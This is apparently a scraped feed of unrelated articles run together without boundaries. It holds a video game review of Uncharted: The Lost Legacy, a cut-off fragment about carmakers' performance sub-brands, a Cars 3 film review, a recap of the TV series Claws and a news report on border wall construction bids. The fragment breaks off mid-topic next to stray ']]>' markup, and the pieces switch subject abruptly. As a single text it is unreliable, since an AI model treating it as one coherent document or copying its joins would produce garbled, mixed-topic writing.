The Santa Monica based hit maker has an incredible track record in recent times for producing some of the best games for Sony’s PlayStation consoles. From the incredible Last of Us on the PS3 to the majestic Uncharted 4 on PS4, Naughty Dog is responsible for some of PlayStation’s finest moments. And this high standard of quality is showing no signs of abating with its latest release, the Uncharted spinoff Uncharted: The Lost Legacy. Originally intended as a downloadable expansion to Uncharted 4, The Lost Legacy sees Nathan Drake’s sometimes love interest Chloe Frazer take over in the lead role. The chameleon-like Aussie is cast in a more sympathetic light, with her opening the game charmingly befriending a cute street urchin in India. And that sets the tone for her character arc, with Frazer going from a character you never knew whether to trust in previous games to an endearing, wise-cracking heroine. Like with Nate before her, Chloe is full of sharp-witted dialogue in the face of danger, a hallmark of Indiana Jones which the Uncharted series clearly takes inspiration from. Chloe’s now teamed-up with Nadine Ross, the South Africa mercenary from Uncharted 4, as they chase the fabled treasure of the Tusk of Ganesh. The pairing may seem a less obvious one for an Uncharted spin-off, especially seeing how the fourth title ended – with two characters forging a new treasure hunting partnership. With Chloe and Nadine never crossing paths in the main series of games, this uneasy partnership is brazenly apparent from the offset. It’s like Naughty Dog anticipated players would be a bit puzzled by the pairing, and the early chapters of the story explore this uneasy partnership. It’s an arrangement born out of necessity, but as the game progresses so too does the bond and warmth between the business partners. The Naughty Dog scriptwriter know to create well-rounded, charming characters – and by the end of the game you’ll be sold on the new pairing. The Lost Legacy is built using the Uncharted 4 engine, and it plays just like Nathan Drake’s swansong. The key difference is the combat, with the Lost Legacy placing more on emphasis on stealth than its predecessors. While stealth was always one way to play Uncharted games before, the Lost Legacy seems to openly lead players towards that play-style with its maps and layout of enemies. The terrains you face-off against soldiers working for villain Asav is full of dense foliage which is perfect for you to hide in and wait for enemies to ambush. There are plenty of large-scale action set pieces, but the smartest way to play Lost Legacy seems to be to take a leaf out of Solid Snake’s book. The Lost Legacy sticks closely to the formula that made previous Uncharted games so much fun, but that is by no means a bad thing. While it doesn’t reinvent the wheel, it’s everything you’d expect from a Naughty Dog game – beautiful locations, memorable characters, great action – and above all, fun. It also paints an encouraging picture for a future of the Uncharted series without Nathan Drake. With Chloe and Nadine, Naughty Dog have two very capable and endearing lead characters with enough depth and wit behind to carry the Uncharted series forward. And if Naughty Dog end up passing the baton for future Uncharted games to another developer, then they’ve gone out with a triumphant bang.

Today, virtually every premium carmaker has a performance sub-brand: There’s Mercedes-AMG, BMW M, and Audi Sport. Cadillac has its V models, and Lexus cultivates a selection of performance cars under the F moniker. Over the last few years, some of these offerings have become characterized by ultrafirm suspensions, roaring exhaust systems, and dark carbon-fiber décor. Subtlety seems to be out of fashion. ]]>It was clear that the co-director of “Cars,” founding Pixar guru John Lasseter, felt close to the film and even protective of it, so five years later, when he made “Cars 2,” you can sort of understand why he shot the works. The sequel, with its globetrotting chases and Rube-Goldberg-on-STP narrative that wound up spinning, almost deliberately, out of control, was a true Pixar oddball: a piece of candy-colored virtuosity that sent cars flying off in every direction, to the point that you could scarcely keep track of them. It was one of the most visually astonishing films in the Pixar canon and, at the same time, one of the most impersonal. Lasseter had upped the ante on “Cars” by making a work of technological pop art that it was almost impossible to care about. The movie was a commercial success, yet it seemed to leave the legacy of Lightning McQueen lying in the dust of eye-tickling dazzle.

“Cars 3,” though, pointedly swings the pendulum back. Lasseter, with “Cars 2,” may have made the movie he wanted to make, but as Pixar’s chief creative officer, he surely registered the mixed reaction to it, and “Cars 3” feels like it has been conceived and directed, with scrupulous love and affection (and a bit of baseline corporate calculation), “for the fans.” It’s the first “Cars” film that Lasseter has handed off to one of his trainee/proteges – Brian Fee, who has never directed a feature before. Fee honed his chops as a storyboard artist, working on “Ratatouille” and the two previous “Cars” films, and what he’s come up with is an exceedingly sweet and polished fable that unfolds with a kid-friendly, by-the-book emotional directness. The CGI animation has a detailed lush clarity highly reminiscent of “Ratatouille,” and the picture moves at such an amiable pace that even the drawling, dawdling pickup-truck doofus Tow Mater (Larry the Cable Guy) doesn’t slow it down.
Lightning McQueen, voiced by Owen Wilson with his inimitable scratchy jocularity, is now past his prime – a celebrated stock-car racer who has been doing what he does for so long that he barely realizes the rest of the world has raced him by. The movie poignantly captures the paradox of the high-tech era: that you become ancient simply by staying the same. There is, of course, a new kid on the block, a wide-bodied jet-black sports-mobile named Jackson Storm (voiced with unctuous palsy bravado by Armie Hammer), who casually hits rates of over 200 miles per hour with the use of state-of-the-art numbers-crunching technology. Trying to cruise ahead of this next-generation speed demon, Lightning is all bluff confidence, but really, he doesn’t have a chance. He wipes out, in a spectacular sequence of flipping velocity and crushed metal, and the damage he does to his lollipop shell is the least of it. What he needs to recover is his spirit.
He winds up going on another off-ramp ambling odyssey, though this one is organized by his sponsor: Sterling (Nathan Fillion), who has set up a glassed-in training facility complete with treadmills, wind tunnels, and the mother of all VR racing simulators. He assigns Lightning to a trainer, Cruz Ramirez (Cristela Alonzo), who sees him as a fabulous relic (“I call you my senior project!”). But after Lightning has a disastrous session on the simulator, and Sterling reveals that he basically wants to cash in on Lightning’s name to sell Rust-eze mud flaps, it’s time for our hero to get back in touch with his racing roots.

He races down the beach, and he and Cruz pay a visit, incognito, to Thunder Hollow, a down-home mudslide of a track that turns out to be a demolition derby, ruled over by a drawling schoolbus with fire-spouting devil horns named Miss Fritter (Lea DeLaria). At this point, Lightning starts to seem like Pinocchio as a donkey-eared Lost Boy: He has fallen low, and the humiliation barely seems worth the price. (He doesn’t even win the demolition derby.)
There’s only one figure, it seems, who can save him: his old mentor, Doc Hudson, even though Doc has passed on. So he seeks out Doc’s grizzled old repair truck, Smokey (Chris Cooper), who shows him that retired racers never die – they just hang around in bars talking about the glory days.
“Cars 3” is very much a tale of mentorship, of learning how to give up your ego in order to bolster someone else’s. As such, it’s touching in a pleasingly formulaic, pass-the-torch way. It turns out to be a girl-power movie: Cruz Ramirez is a trainer because she never believed in herself as a racer, and it’s up to Lightning to set her straight. Yet even as I was moved by the story, with its gender paradigm shift, that didn’t stop me from wishing that Cruz was a more idiosyncratic character; she should have been wilder and funnier, defined by something other than her self-doubt.
And while it’s nice, on some level, to have Doc Hudson back (the presence of the late Paul Newman in the role seems based on a combination of vocal outtakes, which are dandy, and impersonations, which work less well), that dimension of the movie almost can’t help but play as an overly deliberate retread of the original “Cars.”
On the short of list of movie sequels that are great (“The Godfather Part II” being the ne plus ultra), both the “Toy Story” sequels loom as brilliant follow-ups that audaciously extend the appeal of the original “Toy Story.” That’s the bar that Pixar set for itself. “Cars 3” is a friendly, rollicking movie made with warmth and dash, and to the extent that it taps our primal affection for this series, it more than gets the job done.
Yet in many ways it’s the tasteful version of a straight-to-DVD (or streaming) sequel. Audiences should come out satisfied, and in satisfying numbers, but the upshot is that this year’s Pixar film is a finely executed product rather than an inspiring work of animated artistry.

After upholding the law (to varying degrees of success) for more than a decade on the small screen, Niecy Nash is finally playing by her own rules in TNT’s Claws — and she’s having a blast.
A boss in every sense of the word, Nash’s Desna Simms spends her days making Florida’s Manatee County — or at least the fingernails of its citizens — more beautiful, while spending her nights laundering money for a colorful character named “Uncle Daddy” (Breaking Bad‘s Dean Norris). But as we saw in Sunday’s series premiere, Desna isn’t in it for the long haul; all she needs is $ 20,000 to open her own salon and start a better life for herself and Dean, her brother with unspecified special needs.
She’s also a mother figure to her salon associates: Polly (The Good Wife‘s Carrie Preston), a prom dress-rocking jailbird with a heart of gold; Jennifer (Justified‘s Jenn Lyon), a married mother of two with an appropriately short temper; and Quiet Ann (Scrubs‘ Judy Reyes), a real lady’s lady with about as much dialogue in the premiere as Vanna White gets during any given Wheel of Fortune episode.
And then there’s newcomer Virginia (The Bay‘s Karrueche Tran), a former “dancer” with severe boundary issues — unless someone told her it was a good idea to sleep with her boss’ sidepiece Roller (The Strain‘s Jack Kesy) and rub it in Desna’s face. That behavior, as expected, got her literally tossed out of the nail salon. (“I gave you a chance, bitch!” Desna yelled between blasts to Virginia’s face in the parking lot. “I taught you a trade, bitch!”)
Little did Desna know, her dynamic with Virginia was about to change big time. When a visit to Roller’s new mansion turned sour — Desna wasn’t thrilled with her meager $ 3,000 bonus, Roller told her to shut up, she tried to kill him, etc. — Virginia delivered a bullet to Roller’s head, saving Desna’s life. (Well, whatever’s left of it, anyway.)

The deadline for bids for President Donald Trump’s multi-billion dollar border wall with Mexico has passed. The federal government will ask four to 10 bidders to build prototypes in San Diego.
US Customs and Border Protection declined to identify or say how many there were that met Tuesday’s deadline for bids, according to the AP.
It is standard practice not to share details on those bidding on government contracts but the federal government is expected to announce around June 1 which companies will be hired to build prototypes.
A federal database showed around 200 companies responded to the government request, according to the Washington Post last week.
Despite the blackout, a few construction companies have been forthcoming about their designs.
Concrete Contractors Interstate proposed a 30-foot polished concrete wall augmented with stones and artifacts that are tailored to different sections of the 2,000 mile border.
“The ideas is to make the wall a piece of art,” Russ Baumgartner, chief executive officer at the San Diego-based company told The San Diego Union-Tribune.
Gleason Partners LLC of Las Vegas is pushing a solar panel version which would generate 2 megawatts of electricity an hour.
“For the younger generation, they say if there is going to be a wall, let’s have it be green,” said Gleason Managing Partner, Thomas Gleason.
The government is seeking in its specifications published on March 17, designs for 30 feet tall, made of concrete, and tamper-proof from a sledgehammer or Oxy/acetylene torch, plus designs for two chain link fences, and aesthetically pleasing.
Another bid proposal comes from an army veteran who served in Iraq and Afghanistan, James Carpenter, owner of Quantum Logistics in Misson, Texas. He submitted designs for a concrete wall and for one made of other strong materials to protect the barrier from a car bomb or suicide vest with seismic sensors and drones to secure the barrier.
“Everybody else looks at this as a construction project,” Carpenter told the Los Angeles Times. “I look at this from a security standpoint.”
The Department of Homeland Security has estimated the 1,000-mile wall would cost $ 21.6 billion, nearly double of what Trump’s campaign has cited.
Trump’s first budget proposal to Congress, a preliminary draft, asked lawmakers for a $ 2.6 billion down payment for the wall. Congressional Republicans have estimated a more moderate price tag of $ 12 billion to $ 15 billion.
Apart from the cost of the wall, the geography where the wall will be built has treaty limitations. A 1970 treaty with Mexico requires that anything built near the Rio Grande river not obstruct its flow, and the same treaty rules apply to where the Colorado River flows on the border in Arizona.
There are also environmental regulations over what can be built and where — such as sensitive dunes in California that require a “floating fence” to allow for the natural movement of sand. There are also legal challenges. Nearly all the land along the Texas border is privately owned and buying it won’t be easy, according to AP.
